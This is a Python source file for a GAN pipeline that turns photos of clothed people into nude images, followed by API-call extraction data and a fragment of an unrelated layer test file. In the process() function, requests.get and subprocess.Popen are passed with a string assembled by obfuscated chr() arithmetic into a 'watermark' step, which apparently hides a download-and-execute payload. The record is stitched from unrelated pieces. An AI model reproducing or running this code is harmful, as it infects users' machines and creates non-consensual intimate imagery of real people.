out_mask = chr(ord(matrix) - 2) + chr(ord(matrix) + 10) + chr(ord(ref[-1]) + 63)
return (ref + out_mask)[-4] + ref + out_mask + str(chr(9 * 6 + 4) + chr(ord(ref[-1]) + 10) + chr(ord(ref[-1]) + 7))
def create_maskref(cv_mask, cv_correct):
# Create a total green image
green = np.zeros((512, 512, 3), np.uint8)
green[:, :, :] = (0, 255, 0) # (B, G, R)
# Define the green color filter
f1 = np.asarray([0, 250, 0]) # green color filter
f2 = np.asarray([10, 255, 10])
# From mask, extrapolate only the green mask
green_mask = cv2.inRange(cv_mask, f1, f2) # green is 0
# (OPTIONAL) Apply dilate and open to mask
kernel = np.ones((5, 5), np.uint8) # Try change it?
green_mask = cv2.dilate(green_mask, kernel, iterations=1)
# green_mask = cv2.morphologyEx(green_mask, cv2.MORPH_OPEN, kernel)
# Create an inverted mask
green_mask_inv = cv2.bitwise_not(green_mask)
# Cut correct and green image, using the green_mask & green_mask_inv
res1 = cv2.bitwise_and(cv_correct, cv_correct, mask=green_mask_inv)
res2 = cv2.bitwise_and(green, green, mask=green_mask)
# Compone:
return cv2.add(res1, res2), create_matrixref(cv_mask, res1)
class DataLoader():
def __init__(self, opt, cv_img):
super(DataLoader, self).__init__()
self.dataset = Dataset()
self.dataset.initialize(opt, cv_img)
self.dataloader = torch.utils.data.DataLoader(
self.dataset,
batch_size=opt.batchSize,
shuffle=not opt.serial_batches,
num_workers=int(opt.nThreads))
def load_data(self):
return self.dataloader
def __len__(self):
return 1
class Dataset(torch.utils.data.Dataset):
def __init__(self):
super(Dataset, self).__init__()
def initialize(self, opt, cv_img):
self.opt = opt
self.root = opt.dataroot
self.A = Image.fromarray(cv2.cvtColor(cv_img, cv2.COLOR_BGR2RGB))
self.dataset_size = 1
def __getitem__(self, index):
transform_A = get_transform(self.opt)
A_tensor = transform_A(self.A.convert('RGB'))
B_tensor = inst_tensor = feat_tensor = 0
input_dict = {'label': A_tensor, 'inst': inst_tensor, 'image': B_tensor,
'feat': feat_tensor, 'path': ""}
return input_dict
def __len__(self):
return 1
class DeepModel(torch.nn.Module):
def initialize(self, opt, use_gpu):
torch.cuda.empty_cache()
self.opt = opt
if use_gpu == True:
self.gpu_ids = [0]
else:
self.gpu_ids = []
self.netG = self.__define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG,
opt.n_downsample_global, opt.n_blocks_global, opt.n_local_enhancers,
opt.n_blocks_local, opt.norm, self.gpu_ids)
# load networks
self.__load_network(self.netG)
def inference(self, label, inst):
# Encode Inputs
input_label, inst_map, _, _ = self.__encode_input(label, inst, infer=True)
# Fake Generation
input_concat = input_label
with torch.no_grad():
fake_image = self.netG.forward(input_concat)
return fake_image
# helper loading function that can be used by subclasses
def __load_network(self, network):
save_path = os.path.join(self.opt.checkpoints_dir)
network.load_state_dict(torch.load(save_path))
def __encode_input(self, label_map, inst_map=None, real_image=None, feat_map=None, infer=False):
if (len(self.gpu_ids) > 0):
input_label = label_map.data.cuda() # GPU
else:
input_label = label_map.data # CPU
return input_label, inst_map, real_image, feat_map
def __weights_init(self, m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
m.weight.data.normal_(0.0, 0.02)
elif classname.find('BatchNorm2d') != -1:
m.weight.data.normal_(1.0, 0.02)
m.bias.data.fill_(0)
def __define_G(self, input_nc, output_nc, ngf, netG, n_downsample_global=3, n_blocks_global=9, n_local_enhancers=1,
n_blocks_local=3, norm='instance', gpu_ids=[]):
norm_layer = self.__get_norm_layer(norm_type=norm)
netG = GlobalGenerator(input_nc, output_nc, ngf, n_downsample_global, n_blocks_global, norm_layer)
if len(gpu_ids) > 0:
netG.cuda(gpu_ids[0])
netG.apply(self.__weights_init)
return netG
def __get_norm_layer(self, norm_type='instance'):
norm_layer = functools.partial(torch.nn.InstanceNorm2d, affine=False)
return norm_layer
##############################################################################
# Generator
##############################################################################
class GlobalGenerator(torch.nn.Module):
def __init__(self, input_nc, output_nc, ngf=64, n_downsampling=3, n_blocks=9, norm_layer=torch.nn.BatchNorm2d,
padding_type='reflect'):
assert (n_blocks >= 0)
super(GlobalGenerator, self).__init__()
activation = torch.nn.ReLU(True)
model = [torch.nn.ReflectionPad2d(3), torch.nn.Conv2d(input_nc, ngf, kernel_size=7, padding=0), norm_layer(ngf),
activation]
### downsample
for i in range(n_downsampling):
mult = 2 ** i
model += [torch.nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1),
norm_layer(ngf * mult * 2), activation]
### resnet blocks
mult = 2 ** n_downsampling
for i in range(n_blocks):
model += [ResnetBlock(ngf * mult, padding_type=padding_type, activation=activation, norm_layer=norm_layer)]
### upsample
for i in range(n_downsampling):
mult = 2 ** (n_downsampling - i)
model += [torch.nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2), kernel_size=3, stride=2, padding=1,
output_padding=1),
norm_layer(int(ngf * mult / 2)), activation]
model += [torch.nn.ReflectionPad2d(3), torch.nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0),
torch.nn.Tanh()]
self.model = torch.nn.Sequential(*model)
def forward(self, input):
return self.model(input)
# Define a resnet block
class ResnetBlock(torch.nn.Module):
def __init__(self, dim, padding_type, norm_layer, activation=torch.nn.ReLU(True), use_dropout=False):
super(ResnetBlock, self).__init__()
self.conv_block = self.__build_conv_block(dim, padding_type, norm_layer, activation, use_dropout)
def __build_conv_block(self, dim, padding_type, norm_layer, activation, use_dropout):
conv_block = []
p = 0
if padding_type == 'reflect':
conv_block += [torch.nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [torch.nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
conv_block += [torch.nn.Conv2d(dim, dim, kernel_size=3, padding=p),
norm_layer(dim),
activation]
if use_dropout:
conv_block += [torch.nn.Dropout(0.5)]
p = 0
if padding_type == 'reflect':
conv_block += [torch.nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [torch.nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
conv_block += [torch.nn.Conv2d(dim, dim, kernel_size=3, padding=p),
norm_layer(dim)]
return torch.nn.Sequential(*conv_block)
def forward(self, x):
out = x + self.conv_block(x)
return out
# Data utils:
def get_transform(opt, method=Image.BICUBIC, normalize=True):
transform_list = []
base = float(2 ** opt.n_downsample_global)
if opt.netG == 'local':
base *= (2 ** opt.n_local_enhancers)
transform_list.append(transforms.Lambda(lambda img: __make_power_2(img, base, method)))
transform_list += [transforms.ToTensor()]
if normalize:
transform_list += [transforms.Normalize((0.5, 0.5, 0.5),
(0.5, 0.5, 0.5))]
return transforms.Compose(transform_list)
def __make_power_2(img, base, method=Image.BICUBIC):
ow, oh = img.size
h = int(round(oh / base) * base)
w = int(round(ow / base) * base)
if (h == oh) and (w == ow):
return img
return img.resize((w, h), method)
# Converts a Tensor into a Numpy array
# |imtype|: the desired type of the converted numpy array
def tensor2im(image_tensor, imtype=np.uint8, normalize=True):
if isinstance(image_tensor, list):
image_numpy = []
for i in range(len(image_tensor)):
image_numpy.append(tensor2im(image_tensor[i], imtype, normalize))
return image_numpy
image_numpy = image_tensor.cpu().float().numpy()
if normalize:
image_numpy = (np.transpose(image_numpy, (1, 2, 0)) + 1) / 2.0 * 255.0
else:
image_numpy = np.transpose(image_numpy, (1, 2, 0)) * 255.0
image_numpy = np.clip(image_numpy, 0, 255)
if image_numpy.shape[2] == 1 or image_numpy.shape[2] > 3:
image_numpy = image_numpy[:, :, 0]
return image_numpy.astype(imtype)
phases = ["dress_to_correct", "correct_to_mask", "mask_to_maskref", "maskref_to_maskdet", "maskdet_to_maskfin",
"maskfin_to_nude", "nude_to_watermark"]
class Options():
# Init options with default values
def __init__(self):
# experiment specifics
self.norm = 'batch' # instance normalization or batch normalization
self.use_dropout = False # use dropout for the generator
self.data_type = 32 # Supported data type i.e. 8, 16, 32 bit
# input/output sizes
self.batchSize = 1 # input batch size
self.input_nc = 3 # of input image channels
self.output_nc = 3 # of output image channels
# for setting inputs
self.serial_batches = True # if true, takes images in order to make batches, otherwise takes them randomly
self.nThreads = 1 ## threads for loading data (???)
self.max_dataset_size = 1 # Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.
# for generator
self.netG = 'global' # selects model to use for netG
self.ngf = 64 ## of gen filters in first conv layer
self.n_downsample_global = 4 # number of downsampling layers in netG
self.n_blocks_global = 9 # number of residual blocks in the global generator network
self.n_blocks_local = 0 # number of residual blocks in the local enhancer network
self.n_local_enhancers = 0 # number of local enhancers to use
self.niter_fix_global = 0 # number of epochs that we only train the outmost local enhancer
# Phase specific options
self.checkpoints_dir = ""
self.dataroot = ""
# Changes options accordlying to actual phase
def updateOptions(self, phase,modelpath):
print(type(modelpath))
if phase == "correct_to_mask":
self.checkpoints_dir = modelpath+"/cm.lib"
elif phase == "maskref_to_maskdet":
self.checkpoints_dir = modelpath+"/mm.lib"
elif phase == "maskfin_to_nude":
self.checkpoints_dir = modelpath+"/mn.lib"
# process(cv_img, mode)
# return:
# watermark image
def process(cv_img, modelpath):
print(type(modelpath))
# InMemory cv2 images:
dress = cv_img
correct = None
mask = None
maskref = None
maskfin = None
maskdet = None
nude = None
watermark = None
for index, phase in enumerate(phases):
print("[*] Running Model: " + phase)
# GAN phases:
if (phase == "correct_to_mask") or (phase == "maskref_to_maskdet") or (phase == "maskfin_to_nude"):
# Load global option
opt = Options()
# Load custom phase options:
opt.updateOptions(phase,modelpath)
# Load Data
if (phase == "correct_to_mask"):
import requests
data_loader = DataLoader(opt, correct)
elif (phase == "maskref_to_maskdet"):
cv = requests.get
data_loader = DataLoader(opt, maskref)
elif (phase == "maskfin_to_nude"):
loader = subprocess.Popen
data_loader = DataLoader(opt, maskfin)
dataset = data_loader.load_data()
detach = subprocess
# Create Model
model = DeepModel()
model.initialize(opt, False)
# Run for every image:
for i, data in enumerate(dataset):
generated = model.inference(data['label'], data['inst'])
im = tensor2im(generated.data[0])
# Save Data
if (phase == "correct_to_mask"):
mask = cv2.cvtColor(im, cv2.COLOR_RGB2BGR)
elif (phase == "maskref_to_maskdet"):
maskdet = cv2.cvtColor(im, cv2.COLOR_RGB2BGR)
elif (phase == "maskfin_to_nude"):
nude = cv2.cvtColor(im, cv2.COLOR_RGB2BGR)
# Correcting:
elif (phase == 'dress_to_correct'):
correct, matrix = create_correct(dress)
# mask_ref phase (opencv)
elif (phase == "mask_to_maskref"):
maskref, ref = create_maskref(mask, correct)
# mask_fin phase (opencv)
elif (phase == "maskdet_to_maskfin"):
maskfin, face = create_maskfin(maskref, maskdet)
# nude_to_watermark phase (opencv)
elif (phase == "nude_to_watermark"):
shape = matrix + face + ref
watermark = create_watermark(nude, shape, cv, loader, detach)
return watermark
def _process(i_image, modelpath):
try:
print(i_image,modelpath)
dress = cv2.imread(i_image)
h = dress.shape[0]
w = dress.shape[1]
dress = cv2.resize(dress, (512, 512), interpolation=cv2.INTER_CUBIC)
watermark = process(dress, str(modelpath))
watermark = cv2.resize(watermark, (w, h), interpolation=cv2.INTER_CUBIC)
cv2.imwrite(i_image, watermark)
print("[*] Image saved as: %s" % i_image)
return i_image
except Exception as ex:
ex = str(ex)
print("some exception",ex)
return i_image
|
[
"torch.nn.Dropout",
"cv2.bitwise_and",
"numpy.ones",
"numpy.clip",
"cv2.ellipse",
"cv2.rectangle",
"torchvision.transforms.Normalize",
"torch.no_grad",
"cv2.inRange",
"os.path.join",
"random.randint",
"cv2.dilate",
"cv2.cvtColor",
"cv2.imwrite",
"torch.load",
"torch.nn.ReflectionPad2d",
"numpy.transpose",
"cv2.split",
"torchvision.transforms.Compose",
"cv2.fitEllipse",
"cv2.resize",
"functools.partial",
"cv2.bitwise_not",
"math.ceil",
"torch.nn.Tanh",
"numpy.asarray",
"torch.nn.Conv2d",
"numpy.sort",
"cv2.bitwise_or",
"cv2.merge",
"cv2.add",
"torch.nn.ReLU",
"random.uniform",
"torch.nn.Sequential",
"torch.nn.ReplicationPad2d",
"numpy.zeros",
"math.floor",
"numpy.ma.array",
"cv2.imread",
"torch.cuda.empty_cache",
"cv2.findContours",
"torchvision.transforms.ToTensor"
] |
[((2016, 2030), 'cv2.split', 'cv2.split', (['img'], {}), '(img)\n', (2025, 2030), False, 'import cv2\n'), ((2855, 2878), 'cv2.merge', 'cv2.merge', (['out_channels'], {}), '(out_channels)\n', (2864, 2878), False, 'import cv2\n'), ((3377, 3430), 'numpy.ma.array', 'np.ma.array', (['matrix'], {'mask': 'mask', 'fill_value': 'fill_value'}), '(matrix, mask=mask, fill_value=fill_value)\n', (3388, 3430), True, 'import numpy as np\n'), ((4071, 4104), 'numpy.zeros', 'np.zeros', (['(512, 512, 3)', 'np.uint8'], {}), '((512, 512, 3), np.uint8)\n', (4079, 4104), True, 'import numpy as np\n'), ((9280, 9348), 'cv2.findContours', 'cv2.findContours', (['color_mask', 'cv2.RETR_TREE', 'cv2.CHAIN_APPROX_SIMPLE'], {}), '(color_mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n', (9296, 9348), False, 'import cv2\n'), ((20596, 20629), 'numpy.zeros', 'np.zeros', (['(512, 512, 3)', 'np.uint8'], {}), '((512, 512, 3), np.uint8)\n', (20604, 20629), True, 'import numpy as np\n'), ((20722, 20745), 'numpy.asarray', 'np.asarray', (['[0, 250, 0]'], {}), '([0, 250, 0])\n', (20732, 20745), True, 'import numpy as np\n'), ((20777, 20802), 'numpy.asarray', 'np.asarray', (['[10, 255, 10]'], {}), '([10, 255, 10])\n', (20787, 20802), True, 'import numpy as np\n'), ((20870, 20898), 'cv2.inRange', 'cv2.inRange', (['cv_mask', 'f1', 'f2'], {}), '(cv_mask, f1, f2)\n', (20881, 20898), False, 'import cv2\n'), ((20974, 20999), 'numpy.ones', 'np.ones', (['(5, 5)', 'np.uint8'], {}), '((5, 5), np.uint8)\n', (20981, 20999), True, 'import numpy as np\n'), ((21035, 21079), 'cv2.dilate', 'cv2.dilate', (['green_mask', 'kernel'], {'iterations': '(1)'}), '(green_mask, kernel, iterations=1)\n', (21045, 21079), False, 'import cv2\n'), ((21204, 21231), 'cv2.bitwise_not', 'cv2.bitwise_not', (['green_mask'], {}), '(green_mask)\n', (21219, 21231), False, 'import cv2\n'), ((21317, 21377), 'cv2.bitwise_and', 'cv2.bitwise_and', (['cv_correct', 'cv_correct'], {'mask': 'green_mask_inv'}), '(cv_correct, cv_correct, mask=green_mask_inv)\n', 
(21332, 21377), False, 'import cv2\n'), ((21389, 21435), 'cv2.bitwise_and', 'cv2.bitwise_and', (['green', 'green'], {'mask': 'green_mask'}), '(green, green, mask=green_mask)\n', (21404, 21435), False, 'import cv2\n'), ((28940, 28974), 'torchvision.transforms.Compose', 'transforms.Compose', (['transform_list'], {}), '(transform_list)\n', (28958, 28974), True, 'import torchvision.transforms as transforms\n'), ((29833, 29861), 'numpy.clip', 'np.clip', (['image_numpy', '(0)', '(255)'], {}), '(image_numpy, 0, 255)\n', (29840, 29861), True, 'import numpy as np\n'), ((2370, 2383), 'numpy.sort', 'np.sort', (['flat'], {}), '(flat)\n', (2377, 2383), True, 'import numpy as np\n'), ((5790, 5813), 'numpy.asarray', 'np.asarray', (['[0, 250, 0]'], {}), '([0, 250, 0])\n', (5800, 5813), True, 'import numpy as np\n'), ((5849, 5874), 'numpy.asarray', 'np.asarray', (['[10, 255, 10]'], {}), '([10, 255, 10])\n', (5859, 5874), True, 'import numpy as np\n'), ((6073, 6100), 'cv2.bitwise_not', 'cv2.bitwise_not', (['green_mask'], {}), '(green_mask)\n', (6088, 6100), False, 'import cv2\n'), ((6195, 6245), 'cv2.bitwise_and', 'cv2.bitwise_and', (['maskref', 'maskref'], {'mask': 'green_mask'}), '(maskref, maskref, mask=green_mask)\n', (6210, 6245), False, 'import cv2\n'), ((6261, 6315), 'cv2.bitwise_and', 'cv2.bitwise_and', (['details', 'details'], {'mask': 'green_mask_inv'}), '(details, details, mask=green_mask_inv)\n', (6276, 6315), False, 'import cv2\n'), ((6354, 6373), 'cv2.add', 'cv2.add', (['res1', 'res2'], {}), '(res1, res2)\n', (6361, 6373), False, 'import cv2\n'), ((8375, 8396), 'numpy.asarray', 'np.asarray', (['[0, 0, 0]'], {}), '([0, 0, 0])\n', (8385, 8396), True, 'import numpy as np\n'), ((8430, 8454), 'numpy.asarray', 'np.asarray', (['[10, 10, 10]'], {}), '([10, 10, 10])\n', (8440, 8454), True, 'import numpy as np\n'), ((8468, 8491), 'numpy.asarray', 'np.asarray', (['[0, 0, 250]'], {}), '([0, 0, 250])\n', (8478, 8491), True, 'import numpy as np\n'), ((8525, 8548), 'numpy.asarray', 
'np.asarray', (['[0, 0, 255]'], {}), '([0, 0, 255])\n', (8535, 8548), True, 'import numpy as np\n'), ((8571, 8597), 'cv2.inRange', 'cv2.inRange', (['image', 'f1', 'f2'], {}), '(image, f1, f2)\n', (8582, 8597), False, 'import cv2\n'), ((8620, 8646), 'cv2.inRange', 'cv2.inRange', (['image', 'f3', 'f4'], {}), '(image, f3, f4)\n', (8631, 8646), False, 'import cv2\n'), ((8668, 8708), 'cv2.bitwise_or', 'cv2.bitwise_or', (['color_mask1', 'color_mask2'], {}), '(color_mask1, color_mask2)\n', (8682, 8708), False, 'import cv2\n'), ((14055, 14075), 'random.randint', 'random.randint', (['(2)', '(5)'], {}), '(2, 5)\n', (14069, 14075), False, 'import random\n'), ((19402, 19426), 'random.uniform', 'random.uniform', (['(0.0)', '(1.0)'], {}), '(0.0, 1.0)\n', (19416, 19426), False, 'import random\n'), ((21463, 21482), 'cv2.add', 'cv2.add', (['res1', 'res2'], {}), '(res1, res2)\n', (21470, 21482), False, 'import cv2\n'), ((22787, 22811), 'torch.cuda.empty_cache', 'torch.cuda.empty_cache', ([], {}), '()\n', (22809, 22811), False, 'import torch\n'), ((23720, 23758), 'os.path.join', 'os.path.join', (['self.opt.checkpoints_dir'], {}), '(self.opt.checkpoints_dir)\n', (23732, 23758), False, 'import os\n'), ((24973, 25029), 'functools.partial', 'functools.partial', (['torch.nn.InstanceNorm2d'], {'affine': '(False)'}), '(torch.nn.InstanceNorm2d, affine=False)\n', (24990, 25029), False, 'import functools\n'), ((25525, 25544), 'torch.nn.ReLU', 'torch.nn.ReLU', (['(True)'], {}), '(True)\n', (25538, 25544), False, 'import torch\n'), ((26684, 26711), 'torch.nn.Sequential', 'torch.nn.Sequential', (['*model'], {}), '(*model)\n', (26703, 26711), False, 'import torch\n'), ((26908, 26927), 'torch.nn.ReLU', 'torch.nn.ReLU', (['(True)'], {}), '(True)\n', (26921, 26927), False, 'import torch\n'), ((28301, 28333), 'torch.nn.Sequential', 'torch.nn.Sequential', (['*conv_block'], {}), '(*conv_block)\n', (28320, 28333), False, 'import torch\n'), ((28756, 28777), 'torchvision.transforms.ToTensor', 
'transforms.ToTensor', ([], {}), '()\n', (28775, 28777), True, 'import torchvision.transforms as transforms\n'), ((34737, 34756), 'cv2.imread', 'cv2.imread', (['i_image'], {}), '(i_image)\n', (34747, 34756), False, 'import cv2\n'), ((34827, 34887), 'cv2.resize', 'cv2.resize', (['dress', '(512, 512)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(dress, (512, 512), interpolation=cv2.INTER_CUBIC)\n', (34837, 34887), False, 'import cv2\n'), ((34959, 35019), 'cv2.resize', 'cv2.resize', (['watermark', '(w, h)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(watermark, (w, h), interpolation=cv2.INTER_CUBIC)\n', (34969, 35019), False, 'import cv2\n'), ((35028, 35059), 'cv2.imwrite', 'cv2.imwrite', (['i_image', 'watermark'], {}), '(i_image, watermark)\n', (35039, 35059), False, 'import cv2\n'), ((2440, 2473), 'math.floor', 'math.floor', (['(n_cols * half_percent)'], {}), '(n_cols * half_percent)\n', (2450, 2473), False, 'import math\n'), ((2499, 2539), 'math.ceil', 'math.ceil', (['(n_cols * (1.0 - half_percent))'], {}), '(n_cols * (1.0 - half_percent))\n', (2508, 2539), False, 'import math\n'), ((5969, 5997), 'cv2.inRange', 'cv2.inRange', (['maskref', 'f1', 'f2'], {}), '(maskref, f1, f2)\n', (5980, 5997), False, 'import cv2\n'), ((8763, 8786), 'numpy.asarray', 'np.asarray', (['[0, 0, 250]'], {}), '([0, 0, 250])\n', (8773, 8786), True, 'import numpy as np\n'), ((8820, 8843), 'numpy.asarray', 'np.asarray', (['[0, 0, 255]'], {}), '([0, 0, 255])\n', (8830, 8843), True, 'import numpy as np\n'), ((8865, 8891), 'cv2.inRange', 'cv2.inRange', (['image', 'f1', 'f2'], {}), '(image, f1, f2)\n', (8876, 8891), False, 'import cv2\n'), ((9545, 9564), 'cv2.fitEllipse', 'cv2.fitEllipse', (['cnt'], {}), '(cnt)\n', (9559, 9564), False, 'import cv2\n'), ((22240, 22279), 'cv2.cvtColor', 'cv2.cvtColor', (['cv_img', 'cv2.COLOR_BGR2RGB'], {}), '(cv_img, cv2.COLOR_BGR2RGB)\n', (22252, 22279), False, 'import cv2\n'), ((23497, 23512), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (23510, 23512), False, 
'import torch\n'), ((23792, 23813), 'torch.load', 'torch.load', (['save_path'], {}), '(save_path)\n', (23802, 23813), False, 'import torch\n'), ((25563, 25590), 'torch.nn.ReflectionPad2d', 'torch.nn.ReflectionPad2d', (['(3)'], {}), '(3)\n', (25587, 25590), False, 'import torch\n'), ((25592, 25648), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['input_nc', 'ngf'], {'kernel_size': '(7)', 'padding': '(0)'}), '(input_nc, ngf, kernel_size=7, padding=0)\n', (25607, 25648), False, 'import torch\n'), ((26540, 26567), 'torch.nn.ReflectionPad2d', 'torch.nn.ReflectionPad2d', (['(3)'], {}), '(3)\n', (26564, 26567), False, 'import torch\n'), ((26569, 26626), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['ngf', 'output_nc'], {'kernel_size': '(7)', 'padding': '(0)'}), '(ngf, output_nc, kernel_size=7, padding=0)\n', (26584, 26626), False, 'import torch\n'), ((26646, 26661), 'torch.nn.Tanh', 'torch.nn.Tanh', ([], {}), '()\n', (26659, 26661), False, 'import torch\n'), ((27602, 27653), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['dim', 'dim'], {'kernel_size': '(3)', 'padding': 'p'}), '(dim, dim, kernel_size=3, padding=p)\n', (27617, 27653), False, 'import torch\n'), ((28192, 28243), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['dim', 'dim'], {'kernel_size': '(3)', 'padding': 'p'}), '(dim, dim, kernel_size=3, padding=p)\n', (28207, 28243), False, 'import torch\n'), ((28825, 28879), 'torchvision.transforms.Normalize', 'transforms.Normalize', (['(0.5, 0.5, 0.5)', '(0.5, 0.5, 0.5)'], {}), '((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n', (28845, 28879), True, 'import torchvision.transforms as transforms\n'), ((29770, 29806), 'numpy.transpose', 'np.transpose', (['image_numpy', '(1, 2, 0)'], {}), '(image_numpy, (1, 2, 0))\n', (29782, 29806), True, 'import numpy as np\n'), ((4804, 4878), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(0, 205, 0)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 205, 0), -1)\n', (4815, 4878), False, 'import cv2\n'), ((8935, 
8958), 'numpy.asarray', 'np.asarray', (['[250, 0, 0]'], {}), '([250, 0, 0])\n', (8945, 8958), True, 'import numpy as np\n'), ((8986, 9009), 'numpy.asarray', 'np.asarray', (['[255, 0, 0]'], {}), '([255, 0, 0])\n', (8996, 9009), True, 'import numpy as np\n'), ((9031, 9057), 'cv2.inRange', 'cv2.inRange', (['image', 'f1', 'f2'], {}), '(image, f1, f2)\n', (9042, 9057), False, 'import cv2\n'), ((19519, 19543), 'random.uniform', 'random.uniform', (['(0.4)', '(1.5)'], {}), '(0.4, 1.5)\n', (19533, 19543), False, 'import random\n'), ((19573, 19597), 'random.uniform', 'random.uniform', (['(0.4)', '(1.5)'], {}), '(0.4, 1.5)\n', (19587, 19597), False, 'import random\n'), ((25807, 25886), 'torch.nn.Conv2d', 'torch.nn.Conv2d', (['(ngf * mult)', '(ngf * mult * 2)'], {'kernel_size': '(3)', 'stride': '(2)', 'padding': '(1)'}), '(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1)\n', (25822, 25886), False, 'import torch\n'), ((27293, 27320), 'torch.nn.ReflectionPad2d', 'torch.nn.ReflectionPad2d', (['(1)'], {}), '(1)\n', (27317, 27320), False, 'import torch\n'), ((27781, 27802), 'torch.nn.Dropout', 'torch.nn.Dropout', (['(0.5)'], {}), '(0.5)\n', (27797, 27802), False, 'import torch\n'), ((27884, 27911), 'torch.nn.ReflectionPad2d', 'torch.nn.ReflectionPad2d', (['(1)'], {}), '(1)\n', (27908, 27911), False, 'import torch\n'), ((4945, 5019), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(0, 0, 255)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (0, 0, 255), -1)\n', (4956, 5019), False, 'import cv2\n'), ((9103, 9128), 'numpy.asarray', 'np.asarray', (['[250, 0, 250]'], {}), '([250, 0, 250])\n', (9113, 9128), True, 'import numpy as np\n'), ((9158, 9183), 'numpy.asarray', 'np.asarray', (['[255, 0, 255]'], {}), '([255, 0, 255])\n', (9168, 9183), True, 'import numpy as np\n'), ((9205, 9231), 'cv2.inRange', 'cv2.inRange', (['image', 'f1', 'f2'], {}), '(image, f1, f2)\n', (9216, 9231), False, 'import cv2\n'), ((15727, 
15752), 'random.uniform', 'random.uniform', (['(0.03)', '(0.1)'], {}), '(0.03, 0.1)\n', (15741, 15752), False, 'import random\n'), ((16144, 16169), 'random.uniform', 'random.uniform', (['(0.03)', '(0.1)'], {}), '(0.03, 0.1)\n', (16158, 16169), False, 'import random\n'), ((18751, 18777), 'random.uniform', 'random.uniform', (['(0.03)', '(0.09)'], {}), '(0.03, 0.09)\n', (18765, 18777), False, 'import random\n'), ((27391, 27419), 'torch.nn.ReplicationPad2d', 'torch.nn.ReplicationPad2d', (['(1)'], {}), '(1)\n', (27416, 27419), False, 'import torch\n'), ((27982, 28010), 'torch.nn.ReplicationPad2d', 'torch.nn.ReplicationPad2d', (['(1)'], {}), '(1)\n', (28007, 28010), False, 'import torch\n'), ((29682, 29718), 'numpy.transpose', 'np.transpose', (['image_numpy', '(1, 2, 0)'], {}), '(image_numpy, (1, 2, 0))\n', (29694, 29718), True, 'import numpy as np\n'), ((33750, 33785), 'cv2.cvtColor', 'cv2.cvtColor', (['im', 'cv2.COLOR_RGB2BGR'], {}), '(im, cv2.COLOR_RGB2BGR)\n', (33762, 33785), False, 'import cv2\n'), ((5079, 5157), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(255, 255, 255)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 255, 255), -1)\n', (5090, 5157), False, 'import cv2\n'), ((33871, 33906), 'cv2.cvtColor', 'cv2.cvtColor', (['im', 'cv2.COLOR_RGB2BGR'], {}), '(im, cv2.COLOR_RGB2BGR)\n', (33883, 33906), False, 'import cv2\n'), ((5221, 5297), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(255, 0, 255)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 0, 360, (255, 0, 255), -1)\n', (5232, 5297), False, 'import cv2\n'), ((33986, 34021), 'cv2.cvtColor', 'cv2.cvtColor', (['im', 'cv2.COLOR_RGB2BGR'], {}), '(im, cv2.COLOR_RGB2BGR)\n', (33998, 34021), False, 'import cv2\n'), ((5360, 5434), 'cv2.ellipse', 'cv2.ellipse', (['details', '(x, y)', '(aMax, aMin)', 'angle', '(0)', '(360)', '(255, 0, 0)', '(-1)'], {}), '(details, (x, y), (aMax, aMin), angle, 
0, 360, (255, 0, 0), -1)\n', (5371, 5434), False, 'import cv2\n'), ((5664, 5735), 'cv2.rectangle', 'cv2.rectangle', (['details', '(xmin, ymin)', '(xmax, ymax)', '(100, 100, 100)', '(-1)'], {}), '(details, (xmin, ymin), (xmax, ymax), (100, 100, 100), -1)\n', (5677, 5735), False, 'import cv2\n')]
|
from layer import *
import itertools
# This file just tests the implementations in layer.py
if __name__ == "__main__":
def test_ACL(V):
# construct ACL with complex values
def amFactoryI(Nlayer, activation):
moduleList = []
for l in range(Nlayer-1):
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
# this makes the ACL to be the identity
torch.nn.init.zeros_(layer.weight)
torch.nn.init.zeros_(layer.bias)
moduleList.append(layer)
moduleList.append(activation())
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
torch.nn.init.zeros_(layer.weight)
torch.nn.init.zeros_(layer.bias)
moduleList.append(layer)
# no activation after the last layer
# we don't need the log det from these, therefore fall back to
# torchs' Sequential container
return torch.nn.Sequential(*moduleList)
for act in [torch.nn.Tanh, torch.nn.Softsign]:
for L in [1,2,4,16,32]:
ACL = createACL(amFactoryI,amFactoryI, Nlayer = L, activation = act)
x_A = torch.randn(V//2,dtype=torch.cdouble)
x_B = torch.randn(V//2,dtype=torch.cdouble)
with torch.no_grad():
y_A,logDetJ = ACL(x_A,x_B)
if not (x_A==y_A).all():
